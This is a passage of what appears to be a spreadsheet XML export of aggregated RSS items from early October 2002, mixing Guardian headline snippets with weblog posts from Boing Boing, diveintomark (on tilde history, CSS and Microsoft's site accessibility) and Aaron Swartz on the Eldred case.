[2] http://www.quicktopic.com/boing/H/K3FKZ6jSJe2Px
[3] http://www.siliconvalley.com/mld/siliconvalley/business/columnists/dan_gillmor/ejournal/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,3,215/
Date: 2002-10-03T04:21:04+01:00*UK latest:* The government should immediately announce that Britain will 
abandon nuclear weapons when the Trident missile system is phased out, say a 
group of eminent scientists.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#switcher
Date: 2002-10-02T09:32:48-05:00_Phil Ringnalda_, in an unrelated discussion about RSS namespaces[1]: 
â€œLooks like [yet another person] decided to switch to NetNewsWire Lite. 
Does it come with crack, or what?â€[1] http://groups.yahoo.com/group/RSS2-Support/message/110
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000215.html
Date: 2002-10-02T17:02:15-08:00This talk is not supposed to be technical or marketing, but more of a ramble. 
We'll see. :-) "Living above the Curve" BB is a strange company, as they've 
been Mac-only are have been in business for over 10 years....
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,11,215/
Date: 2002-10-01T12:41:57+01:00*Live online:* The Observer's *Tracy McVeigh* and experts *Tim Brighouse* and *
Ann Hodgson* will be here on Thursday at 3pm to discuss the government's 
record. Post your questions now.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,9,215/
Date: 2002-10-03T04:20:58+01:00*Education:* The scale of this year's A-level crisis is even worse than 
expected, the inquiry into claims of "grade fixing" has revealed.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#cast_not_the_first_stone
Date: 2002-10-02T09:30:52-05:00First Blood is Spilled at Record Industry Hearings[1]. â€œIn a shocking 
statement made by Back Street Boy, Kevin Richardson, he testified that they 
have NEVER received a royalty check, and that they only took a large advance 
after their third hit album in a row failed to earn them a penny in 
royalties.â€[1] http://www.musicdish.com/mag/?id=6675
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/04.html#history_of_the_tilde
Date: 2002-10-04T00:27:41-05:00So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â€œhome 
directoryâ€,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Ã± 
(now referenced in HTML as the named entity Ã±),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â€œas exclusively a tilde in USA to appease 
SHAREâ€. I can find no further reference as to what this acronym means, or 
what this committee meeting was about. The next reference isn't until 1991, 
when the tilde was officially added to ISO-646[8]. And now, down the rabbit hole we go. Scouring Usenet (which the kids of 
yesterday called â€œDeja Newsâ€, and kids today call â€œGoogle 
Groupsâ€), we find a reprint of a 1991 William Safire (yes, _that_ William 
Safire) article On Language[9], in which we learn that ~ is officially 
pronounced â€œsquiggleâ€.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â€œtildeâ€[20], prompting 
this typographical pun[21]. And that's the earliest reference I can find. So where does that leave us? Unsatisfied, no doubt. There is history here, but 
there are gaps. What happened at that watershed meeting in 1966? How did the 
tilde rise to prominence in the 1980s? When did it become a synonym for 
â€œhome directoryâ€? When did it migrate into the world of web servers 
to provide a cheap and simple way of giving individual users their own web 
sites? I don't know, and the lateness of the hour prevents me from continuing 
my research, a failing for which I apologize profusely. Goodnight, goodnight. 
May you dream of tildes, stars, and whorls.[1]  http://www.cs.tut.fi/~jkorpela/
[2]  http://www.cs.uni.edu/~wallingf/personal/bokonon.html#words
[3]  http://diveintomark.org/archives/2002/10/03.html#when_an_engineer_flaps_his_wings
[4]  http://www.cs.tut.fi/~jkorpela/tilde.html
[5]  http://groups.google.com/groups?selm=3627ac95.66099519%40news.cs.hut.fi
[6]  http://groups.google.com/groups?selm=an_600051281
[7]  http://www.cs.tut.fi/~jkorpela/latin1/ascii-hist.html#7E
[8]  http://czyborra.com/charsets/iso646.html
[9]  http://groups.google.com/groups?selm=735627391.AA02027%40Clone.his.com
[10] http://info.astrian.net/jargon/terms/a/ASCII.html
[11] http://groups.google.com/groups?selm=14595%40shlump.nac.dec.com
[12] http://groups.google.com/groups?selm=CMM.0.88.616446576.cmg%40watsun.cc.columbia.edu
[13] http://groups.google.com/groups?selm=4036%40hoptoad.uucp
[14] http://groups.google.com/groups?selm=669%40kodak.UUCP
[15] http://groups.google.com/groups?selm=3197%40jhunix.UUCP
[16] http://groups.google.com/groups?selm=2428%40cal-asd.fluke.UUCP
[17] http://groups.google.com/groups?selm=778%40brl-bmd.UUCP
[18] http://groups.google.com/groups?selm=2405%40decwrl.UUCP
[19] http://groups.google.com/groups?selm=bnews.ucf-cs.904
[20] http://groups.google.com/groups?selm=bnews.ucbcad.162
[21] http://groups.google.com/groups?selm=bnews.hp-pcd.546
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/03.html#catching_up
Date: 2002-10-03T22:03:04-05:00- _Phil Ringnalda_: Hey Radio, this PRE's for you[1]. â€œYou did update 
Radio.root after yesterday's fix for the double-decoding bug in the aggregator, 
didn't you?â€ 
- _Brad Choate_: Sanitize Plugin[2]. â€œSanitize is a Movable Type plugin 
that allows you to clean HTML and other markup that might exist in an comment 
entry.â€ 
- _Scott Ambler_: The Process of Database Refactoring[3] [via John Beimler[4]] 
â€œA database refactoring is a simple change to a database schema that 
improves its design while retaining both its behavioral and informational 
semantics.â€ 
- _Mac OS X Hints_: Convert Windows Outlook mail to Mail.app[5]. 
â€œConverting the corporate Windows user who has all their old email in 
.pst files for years back? Help them on their way by getting their mail out of 
the proprietary .pst format and into standards based mbox format.â€ 
- _Shelley Powers_: RDF Query-o-matic Light[6] and RDF Query-o-matic Light 
explained[7]. â€œI slaved away this afternoon, persevering in my work in 
spite of numerous obstacles (sunshine, cat on lap, languor) to bring you RDF 
Query-o-Matic Light.â€ 
- _Bill Kearney_: RDF.root[8]. â€œThis is a tool for Radio Userland. Using 
it will allow your Radio8 install to produce RSS-1.0 XML feeds.â€ 
- _Paul Ford_: Borrowing a car[9]. â€œGive me a turkey sandwich.â€ [1] http://philringnalda.com/archives/002337.php
[2] http://www.bradchoate.com/past/mtsanitize.php
[3] http://www.agiledata.org/essays/databaseRefactoring.html
[4] http://john.beimler.org/archives/000058.html
[5] http://www.macosxhints.com/article.php?story=2002100306134721
[6] http://weblog.burningbird.net/class_rdql/query.htm
[7] http://weblog.burningbird.net/archives/000568.php
[8] http://www.ideaspace.net/users/wkearney/misc/radio/radio8/rdf/current/
[9] http://ftrain.com/second_toothpaste.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/03.html#css_and_mobile_devices
Date: 2002-10-03T14:52:57-05:00So, d'ya remember that whole CSS debate that flared up about six months ago? 
(Actually, it flares up continuously in various circles. In fact, I think it's 
about time for it to flare up again in weblogging circles. These things are 
inexorably cyclical. CSS-vs-tables is the hemorrhoid of the web design world. 
But I digress.) If you were around back then, you will no doubt recall that I was in the 
pro-CSS camp[1]. So anyway, d'ya remember that argument that went something like â€œyou 
should design with web standards and CSS because it will future-proof your site 
for the pie-in-the-sky future when people surf the web on mobile 
devicesâ€? Well, it's crap[2]. There are lots of good arguments for designing with web standards and CSS: 
automatically print-friendly pages[3], dynamic style switchers[4], reduced 
bandwidth[5], and aiding and abetting accessibility[6] (a topic which I claim 
to know a lot about[7]), among others. But â€œbecause it'll future-proof 
your site for the next generation of mobile devicesâ€ is not one of them. 
The theory is solid, but apparently nobody told the makers of the mobile 
devices (now that we have them) how it was all supposed to work in practice. 
Oops.[1] http://diveintomark.org/archives/rooms/css/
[2] http://www.dashes.com/anil/index.php?archives/003378.php
[3] http://diveintomark.org/archives/2002/02/01.html#print_me
[4] http://diveintomark.org/archives/2002/02/13.html#css_fun_and_games
[5] http://diveintomark.org/archives/2002/02/14.html#moral_arguments_aside
[6] http://diveintomark.org/archives/2002/02/15.html#css_and_universal_design
[7] http://diveintoaccessibility.org/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/03.html#microsoft_redesign
Date: 2002-10-03T14:42:29-05:00_Jeffrey Zeldman_: Party like it's 1997[1]. â€œMicrosoft has redesigned. 
Its new layout uses font tags and other deprecated junk straight out of the 
mid-1990s. ... When a W3C member company that helped create XHTML and CSS 
ignores or misuses those web standards on its corporate site, you have to 
wonder who didn't get the memo.â€ The new design also fails even the most basic accessibility tests[2]; the home 
page contains 80 instances of images without ALT text. This is the same basic 
failing for which the Sydney Organizing Committee for the Olympic Games was 
successfully sued in 2000[3]. Here is what microsoft.com looks like in a text-only browser[4].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un-ALT-enhanced images (which are mostly spacer images and images-as-bullets) 
add so much clutter to the page that it's very difficult to navigate. Meanwhile, I don't want to imagine what it would sound like through a screen 
reader. Want to find the search box? That's â€œ1pttrans dot gif 1pttrans 
dot gif search for 1pttrans dot gif 1pttrans dot gif form edit box 1pttrans dot 
gif submit button go 1pttrans dot gif link advanced search 1pttrans dot gif 
...â€ And I hope you weren't looking for Microsoft's accessibility home 
page[5]; it's the 76th link on the page (out of 76).[1] http://www.zeldman.com/daily/0902b.html#prince
[2] http://bobby.watchfire.com/bobby/bobbyServlet?advanced=true&amp;URL=http%3A%2F%2Fwww.microsoft.com%2F&amp;gl=wcag1-a&amp;Text=text&amp;line=line&amp;an_errs=an_errs&amp;stealth=Bobby%2F3.3&amp;output=Submit
[3] http://www.contenu.nu/socog.html
[4] http://diveintomark.org/public/microsoft_lynx_output.txt
[5] http://www.microsoft.com/enable/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85520594
Date: Not supplied[IMG: 
http://i.cnn.net/cnn/2002/US/Central/10/02/candidate.blue.skin.ap/story.blue.canidate.ap.jpg
]In 1999, Montana's 63-old Libertarian candidate for Senator starting drinking 
a homebrew concoction of colloidal silver to prevent bacterial infecttion (he 
was afraid that conventional antibiotics wouldn't be available in the new 
millennium), and now his skin has turned blue for good. Link[1] Discuss[2] _
(Thanks for the image, Nelson!)_
[1] http://www.ananova.com/news/story/sm_683401.html
[2] http://www.quicktopic.com/16/H/vvkFvFGKi6J
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535461,215/
Date: 2002-10-04T02:39:04+01:00Executive pay has once again outpaced average earnings, climbing an average of 
17% last year.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85519849
Date: Not suppliedA new census of the world's robot population reveals disturbing negative robot 
population growth, but still, our fleshless offspring's numbers point to a 
machinery future:     Some 20,000 domestic-help robots were sold worldwide last year, half 
    designed to mow lawns. Vacuum-cleaning robots were introduced late in 2001 
    and a study in Sweden found that 5,000 were sold in the last two months of 
    the year. Window-cleaning robots are set to boom, said the U.N. study.  Link[1] Discuss[2] (_Thanks, Gatfishing!_)[1] http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20021003/ap_on_hi_te/un_robots
[2] http://www.quicktopic.com/boing/H/WM8CuKADkMJR
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85521686
Date: Not suppliedThe President's niece will no longer have to forge prescriptions for Valium. 
All she'll have to do is participate in an unruly public demonstration to get a 
free dose. Unfortunately for her, the government has no plans to shoot rocks of 
cocaine at demonstrators, so she'll still have to depend on her drug dealer for 
that.     The U.S. military is exploring ways to use drugs such as Valium to calm 
    people without killing them during riots or other crowd control situations 
    where lethal weapons are inappropriate. Link[1] Discuss[2][1] http://abcnews.go.com/wire/Politics/ap20020925_1716.html
[2] http://www.quicktopic.com/16/H/rwiEsrBZkX8p
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8536504,215/
Date: 2002-10-04T03:40:03+01:00Shipments of low-cost drugs being intercepted and sold at vast profits.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85519806
Date: Not suppliedA San Francisco cabbie -- generally a well-educated and firm-opinion-holding 
class of person -- has an essay about a subject near and dear to my 
(non-car-owning) heart: Why is it so damned hard to get a cab in San Francisco? 
    In fact, no cab company ever tells a driver to pick up anyone. When you 
    phone a cab firm in San Francisco, your call is treated not as an order, 
    not as a binding oral contract, but simply as a request...     So, why don't cab companies ensure that we pick you up on time-or at all? 
    In a nutshell, labor law states that if a cab company actually commands a 
    driver to carry out a specific action, that constitutes an 
    employer-employee relationship. But if a company farms its work out to 
    independent contractors, it can rid itself of costly expenses such as 
    disability and social security taxes. It also means that the contractor 
    drivers can't unionize.  Link[1] Discuss[2] (_via CamWorld[3]_)[1] http://www.bradnewsham.com/articles/why_so_hard.shtml
[2] http://www.quicktopic.com/boing/H/eXFeCJHgnP4
[3] http://www.bradnewsham.com/articles/why_so_hard.shtml
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535464,215/
Date: 2002-10-04T02:39:01+01:00*World latest:* The US and Britain yesterday told the chief UN weapons 
inspector not to resume inspections in Iraq until new guidelines were passed.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000222.html
Date: 2002-10-03T22:15:49-08:00The defective yeti isn't fond of Culture Jam. I read it a year or so ago and 
joined Adbusters as a result. I liked the book, but more importantly, I liked 
the message. It resonated with me. A lot. Yes,...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535465,215/
Date: 2002-10-04T02:39:00+01:00*Business:* Congressional report offers damaging summary of bank's dotcom boom 
years.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000221.html
Date: 2002-10-03T21:59:32-08:00Is it just me, or is RSS really, really close to critical mass. You, know the 
kind where you read article in The Wall Street Journal about it. Well, Dave 
notes that "I just learned that RSS is being taught...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535466,215/
Date: 2002-10-04T02:38:59+01:00*Arts:* Kevin McKenzie last night emerged as the frontrunner to take over at 
the scandal-hit Royal Ballet.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85515860
Date: Not suppliedRob "Pringles Can" Flickenger and others Cliff Skolnik at the O'Reilly OS X con 
has tracked down the cause of the annoying flakiness in the wireless network 
here -- every 20 or 30 seconds, you start getting "connection refused" messages 
from your browser and other net-utilities. Rob "Pringles Can" Flickenger wrote 
it up.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Discuss[3] (_
Thanks, Rob!_)[1] http://www.oreillynet.com/pub/wlg/1414
[2] http://www.oreillynet.com/pub/wlg/2086
[3] http://www.quicktopic.com/boing/H/bfYib9hETQSA
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535468,215/
Date: 2002-10-04T02:38:57+01:00*Media:* BBC and Sky-backed service will be launched at the end of this month 
with 30 free channels.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535469,215/
Date: 2002-10-04T02:38:56+01:00*Politics:* Tony Blair has distanced himself from a minister accused of 
meddling in an election for the leadership of the Labour party's biggest trade 
union affiliate.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8519920,1440/
Date: Not suppliedA French trial of a highly promising treatment for the fatal "bubble boy" 
disease is stopped after a patient developed leukaemia
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535470,215/
Date: 2002-10-04T02:38:55+01:00*Education:* 'Small' A-level problem to be dealt with but no change on student 
grants or charitable status of public schools.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8518006,1440/
Date: Not suppliedA material that turns into a conductor at the flash of a light promises to 
reduce the cost of large LCD displays and optical data storage
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8518007,1440/
Date: Not suppliedA year-long search received more than 40,000 entries from over 70 countries, 
and two million ratings - the analysis is now complete
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8523004,215/
Date: 2002-10-03T18:31:00+01:00*Paris dispatch:* A growing number of French people are questioning the medical 
ruling - and the law - that enabled a Vichy war criminal to walk free, writes *
Jon Henley*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8512678,1440/
Date: Not suppliedDrugs designed to prevent the complications of diabetes may work by slowing 
accelerated ageing - future versions may delay symptoms of ageing in everyone
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524823
Date: Not suppliedDoom has been ported to the Nokia 7650 handset! Link[1] Discuss[2] (_via Ben 
Hammersley.com[3]_)[1] http://www.wildpalm.co.uk/Doom7650.html
[2] http://www.quicktopic.com/boing/H/RnFavNUGmidx
[3] http://www.benhammersley.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524777
Date: Not suppliedThe WSJ has published a round-up of phone companies, wired and wireless, 
ranking them based on performance and price. They don't mention Nextel, whose 
hullking milspec i700 handset I've been carrying for years now, with incredible 
reception all over the US and Canada. Their front-line customer service sucks, 
but the prices and network can't be beat.     T-Mobile is in the midst of a massive makeover. In recent months, the 
    company changed its name and launched an ad campaign featuring Ms. Zeta 
    Jones.     The company has a history worth hiding. T-Mobile, a subsidiary of Deutsche 
    Telekom, is known for having a weak national network, and the FCC received 
    1,466 complaints about the company in the past year, giving it one of the 
    worst complaint rates in the industry. T-Mobile says their complaint rate 
    has tapered off and that they have made substantial network improvements.     But T-Mobile is the cheapest wireless provider, available, with an average 
    cost of just 8.2 cents per minute. (Verizon, by contrast, costs 14.3 cents 
    per minute.)  Link[1] Discuss[2] (_via Camworld[3]_)[1] http://www.msnbc.com/news/816517.asp
[2] http://www.quicktopic.com/boing/H/VKy7KfS2A7jUZ
[3] http://www.camworld.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8561543,1440/
Date: Not suppliedThe ancient remains of 200 fishermen who were tied up and stabbed through the 
heart have been excavated from a beach
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8561544,1440/
Date: Not suppliedWorldCom, the world's biggest internet traffic carrier, suffers a major outage 
which affects millions of users
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524618
Date: Not supplied[IMG: http://www.craphound.com/images/timmyerrorsmall.jpg] Check out this weird 
easter-egg I found in MacOS 10.2.1's Sharing control panel! Link[1] Discuss[2]
[1] http://www.craphound.com/images/timmyerrorbig.jpg
[2] http://www.quicktopic.com/boing/H/W4evyQiUY2xsb
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572788,215/
Date: 2002-10-05T03:05:32+01:00*Society:* Law lords to hear challenge to bill giving big money an even bigger 
say.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572786,215/
Date: 2002-10-05T03:05:33+01:00*Politics:* Government increases secondments from energy, arms and construction 
industries, but tries to keep it dark.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572787,215/
Date: 2002-10-05T03:05:33+01:00*Arts:* Record giant's move highlights changing situation at a time when 
classical market is faltering.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8553538,1440/
Date: Not suppliedViral antibodies are identified in a one-month-old baby, as the US death toll 
rises sharply
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8553539,1440/
Date: Not suppliedA detector from an asteroid-chasing NASA probe will soon be helping detectives 
to solve gun crimes and murder cases
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8553540,1440/
Date: Not suppliedResearch on scrotal asymmetry and the surface area of elephants were among 
other recipients of the 2002 spoof awards
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572789,215/
Date: 2002-10-05T03:05:32+01:00*Money:* House prices have increased by as much as 38% over the past year in 
some areas.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8560348,215/
Date: 2002-10-04T17:55:51+01:00*Brussels dispatch:* Calls for an inquiry into Belgium's complicated wartime 
past are gathering pace, writes *Andrew Osborn*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524596
Date: Not suppliedGreat Village Voice story about oddball museums in New York. My favorite 
weird-ass museum is the Museo de Criminologia in San Jose, Costa Rica, which 
has bits of victims of famous crimes (machete-dented brain-pans, severed arms, 
etc) floating in formaldehyde jars.     A stone's throw away is the singular Freakatorium, El Museo Loco, a classy 
    treasure chest of curiosities belonging to sword swallower Johnny Fox, 
    whose focus is the rich history of America's earliest museums, from P.T. 
    Barnum's American Museum to the Bowery Dime Museums. The walrus penis bone 
    (other penis bones on display: coyote, mink, fox, raccoon) is enough to 
    make you feel you're getting your $5 worth. But then you spy the Jivaro 
    Shrunken Head (it's real, it's the size of a tennis ball); conjoined 
    piglets in a jar; an assload of taxidermy, including a gorgeous zebra head; 
    giant's rings...  Link[1] Discuss[2] (_Thanks, Gary[3]!_)[1] http://www.villagevoice.com/bestof/2002/detail.php?id=3085
[2] http://www.quicktopic.com/boing/H/6XizLZYen3ni
[3] http://amygdalagf.blogspot.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8553541,1440/
Date: Not suppliedA collision is seen from start to finish for the first time - it may provide 
clues to how the Universe's largest single objects are formed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572777,215/
Date: 2002-10-05T03:05:37+01:00Humiliating rebuff for Blair initiative comes only days after plan was 
announced at the Labour conference.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524581
Date: Not suppliedNeil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Link[1] Discuss[2] (_Thanks, Gnat[3]!_)[1] http://www.icv2.com/articles/home/1883.html
[2] http://www.quicktopic.com/boing/H/V9tC6y4mskvW
[3] http://www.frii.com/~gnat/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572778,215/
Date: 2002-10-05T03:05:36+01:00Briton Richard Reid pleads guilty to attempting to blow up flight.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524549
Date: Not suppliedAnil Dash discovers that the T-Mobile Sidekick's web-browser is pretty 
arbitrary in which pages it will load and which pages it will throw up its 
hands at:     So I decided I was going to modify my page to conform to your browser's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Link[1] Discuss[2] (_Thanks, Joe[3]!_)[1] http://www.dashes.com/anil/index.php?archives/003378.php
[2] http://www.quicktopic.com/boing/H/gQqkijtv3NhWZ
[3] http://joeclark.org/access/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524557
Date: Not suppliedSixDegress is a $99 OS X app that data-mines your own hard-drive and tries to 
build links between people, files and folders. Laura Carpenter at the OS X con 
was talking it up yesterday and it looks way cool -- I've just downloaded the 
demo to play with.     * Locate files with similar names or file revisions, anywhere on your 
    system.    * Show all email threads related to any file or person on your desktop.    * View all the files a person has sent you, regardless of where those files 
    are stored on your computer.    * Create dynamic, self-updating projects.    * Find misfiles or attachments quickly without searching desktop folders.    * Navigate and open any message, file or person on your desktop in one 
    click.  Link[1] Discuss[2] (_Thanks, Laura!_)[1] http://www.creo.com/sixdegrees/
[2] http://www.quicktopic.com/boing/H/VRMgpHLfGxpZ
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572779,215/
Date: 2002-10-05T03:05:36+01:00When a Florida journalist was killed by anthrax sent to him by letter, it set 
off a wave of copycat hoaxers. *Jon Ronson* tracks them down.ï¿½Quizzes[1]ï¿½| 
Crossword[2]ï¿½| Interactive guides[3]ï¿½| Steve Bell[4]ï¿½| Weblog[5]ï¿½*Other news 
and comment**Home Office set to rewrite Geneva refugee agreement*[6][1] http://www.newsisfree.com/quiz/0,7476,349695,00.html
[2] http://www.newsisfree.com/crossword/0,4406,180778,00.html
[3] http://www.newsisfree.com/interactive/0,2759,192055,00.html
[4] http://www.newsisfree.com/cartoons/0,7371,337484,00.html
[5] http://www.newsisfree.com/weblog/0,6798,517233,00.html
[6] http://www.newsisfree.com/Refugees_in_Britain/Story/0,2763,805011,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524541
Date: Not supplied[IMG: http://www.craphound.com/images/tsquarebw.jpg]
Wonderful gallery of historical advertising and postcard photos of Times Square 
at Lileks's site. Stefan urges us to "have some mercy on his bandwidth budget 
and consider using the tip jar." Link[1] Discuss[2] (_Thanks, Stefan!_)) 
[1] http://www.lileks.com/NYC/timessquare/index.html
[2] http://www.quicktopic.com/boing/H/ZQS82idFZwr
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572781,215/
Date: 2002-10-05T03:05:36+01:00*World latest:* Hardliners battle for control of divided parliaments and 
presidency.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572783,215/
Date: 2002-10-05T03:05:36+01:00*Business:* Billionaire brothers add store to empire for ï¿½750m.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572784,215/
Date: 2002-10-05T03:05:35+01:00*Football:* Arsenal midfielder believes the Premiership champions have the 
ablility to become the world's best.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572785,215/
Date: 2002-10-05T03:05:34+01:00*Sport: *BBC Panorama programme, The Corruption of Racing, reveals little that 
is new, writes *Greg Wood*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597655,215/
Date: 2002-10-06T02:28:00+01:00*Politics:* Disgraced peer Jeffrey Archer is set to make ï¿½1m from his Belmarsh 
diaries. But the coup could cost him another year inside, reports *Kamal Ahmed*
.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597656,215/
Date: 2002-10-06T02:27:59+01:00*The Observer Profile: *Brazil goes to the polls today, and all the indications 
are that its 110 million voters will elect a man who once sold peanuts on the 
street: *Luis 'Lula' da Silva*.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000637
Date: 2002-10-05T21:15:55-06:00I guess it's time to reveal the incredibly kind invitation I received[1]. As 
many of you may have found out or guessed, I will be attending oral argument 
for the Eldred case[2] before the Supreme Court. I'm incredibly excited, as you might imagine. Visiting the Supreme Court would 
be quite enough, but seeing such an important case...Dayenu! When Lessig asked 
me if I was free that day to come, I laughed because I couldn't (and still 
can't) think of anything I'd rather do than attend. I am eternally grateful to 
Lessig for the chance to attend. On the other hand, I'm sort of embarassed to 
have the opportunity, when there are surely others who deserve it far more than 
me. Luckily, it seems that such deserving others will be able to get seats by 
camping in line with us. So, I'll be arriving in D.C. on Tuesday, attending an 
Eldred/Duke/EPIC/Bookmobile superparty, and then camping in line with Seth 
Schoen[3], Lisa Rein, Jace Cooke but unfortunately not Cory Doctorow. If you'd 
like to come with us, let me know. I was hoping I'd be able to take notes and post them to my weblog for those who 
couldn't make it, but as I read in today's Times, only lawyers and those with 
official press credentials are allowed to take notes![4] I think this is 
outrageous, but hopefully I will be able to remember enough to provide an 
interesting account. In a related irony, today was "Disney Day" at Borders[5], where they played 
Disney rock songs with the volume turned up too loud, disturbing my usual habit 
of reading a book there. However, I did manage to skim through _The Practice of 
Programming_. In an unrelated note, if you haven't been electrocuted by a Model T spark plug, 
I highly recommend it.[1] http://www.aaronsw.com/weblog/000609
[2] http://eldred.cc/
[3] http://vitanuova.loyalty.org/2002-10-02.html
[4] http://www.nytimes.com/2002/10/05/opinion/05AMAR.html
[5] http://www.bordersstores.com/events/event_detail.jsp?SEID=15127444
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597657,215/
Date: 2002-10-06T02:27:58+01:00*Net news:* A devastating new computer virus is causing havoc around the world 
as it crashes computers, distributes confidential e-mails and steals credit 
card details.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8582593,1440/
Date: Not suppliedThe popularity of garage or car-boot sales could be behind a recent worldwide 
resurgence of the nuisance bugs, says a UK scientist
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528842
Date: Not supplied[IMG: http://www.craphound.com/images/bluelady.jpg] Stan Jones isn't the only 
person to have turned himself blue with quack silver remedies. "Rosemary" took 
silver supplements in the 50s for her allergies and put up this site in 1998 to 
warn others off of the horror of blue skin for life. Link[1] Discuss[2] (_
Thanks, Stefan!_) 
[1] http://together.net/~rjstan/rose1.html
[2] http://www.quicktopic.com/boing/H/tCar7pZ5ypi
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597650,215/
Date: 2002-10-06T02:28:05+01:00Michael McKevitt, the founder of the Real IRA, is likely to serve less than two 
more years in jail in a deal to cover up MI5's role in Ireland.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528813
Date: Not supplied[IMG: http://www.craphound.com/images/curlinggame.jpg] An Alberta teenager has 
hit the bigtime with a curling videogame. Friends of mine who curl assure me 
that curling is way fun to play (it certainly isn't that fun to watch!) and, of 
course, you can (and should!) drink beer while playing. I believe that 
disqualifies it as a sport, no? Link[1] Discuss[2] (_Thaanks, Chris!_) 
[1] http://rtnews.globetechnology.com/servlet/ArticleNews/tech/RTGAM/20021004/gtcurl/Technology/techBN/
[2] http://www.quicktopic.com/boing/H/nNRRa5nAStdq
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597651,215/
